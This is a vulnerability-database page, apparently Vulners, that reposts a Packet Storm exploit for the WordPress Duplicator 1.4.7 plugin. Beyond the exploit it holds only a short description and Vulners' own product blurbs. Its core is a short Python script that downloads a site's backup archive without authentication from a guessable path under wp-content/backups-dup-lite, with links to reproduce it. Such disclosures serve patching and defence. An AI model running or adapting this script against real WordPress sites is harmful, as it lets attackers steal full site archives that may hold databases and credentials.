Lucene search
K

WordPress Duplicator 1.4.7 Unauthenticated Backup Download

🗓️ 04 Aug 2022 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 490 Views

WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download. Attacker can download system data

Code
`## Title: WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download  
## Author: nu11secur1ty  
## Date: 08.03.2022  
## Vendor: https://wordpress.org/  
## Software: https://wordpress.org/plugins/duplicator/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin  
  
  
  
## Description:  
The WordPress Plugin Duplicator 1.4.7 suffers from Unauthenticated  
Backup Download.  
The attacker can download all archive information from the system by  
using this vulnerability!  
Status: CRITICAL  
  
[+] Exploit:  
  
```mysql  
#!/usr/bin/python  
# Author nu11secur1ty  
import requests  
import time  
  
vulnerableURL =  
"http://pwned_host.com/wordpress/wp-content/backups-dup-lite/20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip"  
response = requests.get(vulnerableURL)  
open("20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip",  
"wb").write(response.content)  
time.sleep(5)  
print("Right now, you just downloaded the secret archive =)\n")  
  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin)  
  
## Proof and Exploit:  
[href](https://streamable.com/n3osob)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Aug 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
490